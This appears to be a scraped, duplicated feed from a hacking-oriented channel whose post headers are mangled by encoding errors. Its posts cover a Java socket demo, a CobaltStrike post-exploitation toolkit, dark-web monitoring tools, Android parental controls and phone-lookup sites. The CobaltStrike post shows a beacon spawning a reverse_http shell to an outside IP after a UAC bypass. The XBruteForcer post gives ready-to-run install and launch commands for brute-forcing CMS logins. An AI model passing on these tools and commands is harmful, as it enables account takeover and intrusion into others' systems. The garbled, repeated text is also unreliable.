β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - killswitch-GUI/CobaltStrike-ToolKit: Some useful scripts for CobaltStrike
Some useful scripts for CobaltStrike . Contribute to killswitch-GUI/CobaltStrike-ToolKit development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Here is our list of the 10 best dark web monitoring tools for network admins:
Echosec Beacon Checks the Dark Web for compromised account credentials, and stolen personal information and financial data.
SpyCloud ATO Prevention Account takeover prevention with a threat intelligence database derived from Dark Web scans.
Digital Shadows SearchLight A corporate brand protection service.
WhatsUp Gold A network traffic monitor that can identify traffic from the Tor network.
DigitalStakeout Scout A data loss prevention system and threat protection system that includes a Dark Web scanner.
Alert Logic Dark Web Scanner An account takeover prevention system based around a Dark Web scanner.
DarkOwl Vision A threat intelligence service that includes a Dark web scanner as an information source.
ACID Cyber Intelligence A threat intelligence service that scans all known sources of illegal data.
Dashlane Business A comprehensive password protection system that includes a Dark Web scanner.
Have I Been Pwned? A free email address-related Dark Web scan.
FOR BOT LINKS:
https://www.comparitech.com/net-admin/best-dark-web-monitoring-tools/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Here is our list of the 10 best dark web monitoring tools for network admins:
Echosec Beacon Checks the Dark Web for compromised account credentials, and stolen personal information and financial data.
SpyCloud ATO Prevention Account takeover prevention with a threat intelligence database derived from Dark Web scans.
Digital Shadows SearchLight A corporate brand protection service.
WhatsUp Gold A network traffic monitor that can identify traffic from the Tor network.
DigitalStakeout Scout A data loss prevention system and threat protection system that includes a Dark Web scanner.
Alert Logic Dark Web Scanner An account takeover prevention system based around a Dark Web scanner.
DarkOwl Vision A threat intelligence service that includes a Dark web scanner as an information source.
ACID Cyber Intelligence A threat intelligence service that scans all known sources of illegal data.
Dashlane Business A comprehensive password protection system that includes a Dark Web scanner.
Have I Been Pwned? A free email address-related Dark Web scan.
FOR BOT LINKS:
https://www.comparitech.com/net-admin/best-dark-web-monitoring-tools/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Comparitech
10 Best Dark Web Monitoring Tools for Network Admins in 2024
The Dark Web is reported to be a home for hackers and terrorists and it could pose a threat to your company. Find out what it is and how to block it.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Brute Forcer Tool π WordPress , Joomla , DruPal , OpenCart , Magento :
[1] WordPress (Auto Detect Username)
[2] Joomla
[3] DruPal
[4] OpenCart
[5] Magento
[6] All (Auto Detect CMS)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) FOR LINUX:
1) git clone https://github.com/Moham3dRiahi/XBruteForcer.git
2) cd XBruteForcer
3) perl XBruteForcer.pl -l list.txt -p passwords.txt
4) Installation Android alt tag
B) FOR Termux
cpan install LWP::UserAgent
cpan install HTTP::Request
git clone https://github.com/Moham3dRiahi/XBruteForcer.git
cd XBruteForcer
perl XBruteForcer.pl -l list.txt -p passwords.txt
C) Installation Windows alt tag
Download Perl
Download XBruteForcer
Extract XBruteForcer into Desktop
Open CMD and type the following commands:
cd Desktop/XBruteForcer-master/
perl XBruteForcer.pl -l list.txt -p passwords.txt
Version
VERIFIED
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Brute Forcer Tool π WordPress , Joomla , DruPal , OpenCart , Magento :
[1] WordPress (Auto Detect Username)
[2] Joomla
[3] DruPal
[4] OpenCart
[5] Magento
[6] All (Auto Detect CMS)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) FOR LINUX:
1) git clone https://github.com/Moham3dRiahi/XBruteForcer.git
2) cd XBruteForcer
3) perl XBruteForcer.pl -l list.txt -p passwords.txt
4) Installation Android alt tag
B) FOR Termux
cpan install LWP::UserAgent
cpan install HTTP::Request
git clone https://github.com/Moham3dRiahi/XBruteForcer.git
cd XBruteForcer
perl XBruteForcer.pl -l list.txt -p passwords.txt
C) Installation Windows alt tag
Download Perl
Download XBruteForcer
Extract XBruteForcer into Desktop
Open CMD and type the following commands:
cd Desktop/XBruteForcer-master/
perl XBruteForcer.pl -l list.txt -p passwords.txt
Version
VERIFIED
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
Moham3dRiahi/XAttackProV30
XAttacker Tool PRO V30 Website Vulnerability Scanner & Auto Exploiter - Moham3dRiahi/XAttackProV30
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methods for Using Parental Controls on Android :
A)1) Open system preferences . On the home screen or app, find the gear-shaped settings icon. Click on it.
2) Find users . In the settings go to the section "Users" or "Accounts". Click on the "Add Account" command.
3) There is a section here called "Restricted Profile" . A user with limited access rights to the system and applications is created.
4) Setting a pin code . The system will ask you to set a pin code.
5) Later, you will need to enter a pin code to change the settings. It is better to enter a complex password so that children cannot guess it.
6) Application selection . Then a complete list of installed applications will appear. If you deactivate an app, it will not appear on the restricted profile. You can also restrict access to social networks.
7) Profile name . Choose any name.
Exit . After making all the changes, you can leave the settings section.
8) Restricted Access Activation . Now check the created profile. You will be asked which user to select. Click on the name of the restricted profile and enter the pin code. After that, you can use your smartphone with this profile.
9) Disabled apps are not shown here. If you need them, return to your main profile.
B) Using the app
Keeping track of what kids are doing on their smartphones and on the internet is not easy. To make sure they are using the machine for learning, you can install the app. One of the best is Kidgy Android Parental Control . This program can be downloaded from the Play Store. It has many functionalities:
1) Location tracker . In order not to worry about the safety of children, you need to know where they are. The program allows you to see them on the map.
2) Call and message logs . Allows you to monitor how children use the Internet and smartphones. You can track all phone calls and text messages sent and received.
3) Restriction of social networks and websites . There are materials on the Internet that are useful for learning, but there are also materials that are not suitable for children. With this application, you can restrict access to social networks and any sites.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methods for Using Parental Controls on Android :
A)1) Open system preferences . On the home screen or app, find the gear-shaped settings icon. Click on it.
2) Find users . In the settings go to the section "Users" or "Accounts". Click on the "Add Account" command.
3) There is a section here called "Restricted Profile" . A user with limited access rights to the system and applications is created.
4) Setting a pin code . The system will ask you to set a pin code.
5) Later, you will need to enter a pin code to change the settings. It is better to enter a complex password so that children cannot guess it.
6) Application selection . Then a complete list of installed applications will appear. If you deactivate an app, it will not appear on the restricted profile. You can also restrict access to social networks.
7) Profile name . Choose any name.
Exit . After making all the changes, you can leave the settings section.
8) Restricted Access Activation . Now check the created profile. You will be asked which user to select. Click on the name of the restricted profile and enter the pin code. After that, you can use your smartphone with this profile.
9) Disabled apps are not shown here. If you need them, return to your main profile.
B) Using the app
Keeping track of what kids are doing on their smartphones and on the internet is not easy. To make sure they are using the machine for learning, you can install the app. One of the best is Kidgy Android Parental Control . This program can be downloaded from the Play Store. It has many functionalities:
1) Location tracker . In order not to worry about the safety of children, you need to know where they are. The program allows you to see them on the map.
2) Call and message logs . Allows you to monitor how children use the Internet and smartphones. You can track all phone calls and text messages sent and received.
3) Restriction of social networks and websites . There are materials on the Internet that are useful for learning, but there are also materials that are not suitable for children. With this application, you can restrict access to social networks and any sites.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FREE WEBSITES FOR PHONES INFORMATIONS :
https://sync.me/
https://www.truecaller.com/
https://www.opencnam.com/
(request a trial)
https://thatsthem.com/reverse-phone-lookup
https://www.whocalledme.com/choose-your-country
https://freecarrierlookup.com/
https://nuwber.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FREE WEBSITES FOR PHONES INFORMATIONS :
https://sync.me/
https://www.truecaller.com/
https://www.opencnam.com/
(request a trial)
https://thatsthem.com/reverse-phone-lookup
https://www.whocalledme.com/choose-your-country
https://freecarrierlookup.com/
https://nuwber.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Sync.me
Find out who called - Sync.ME
Search any phone number worldwide and block unwanted spam calls.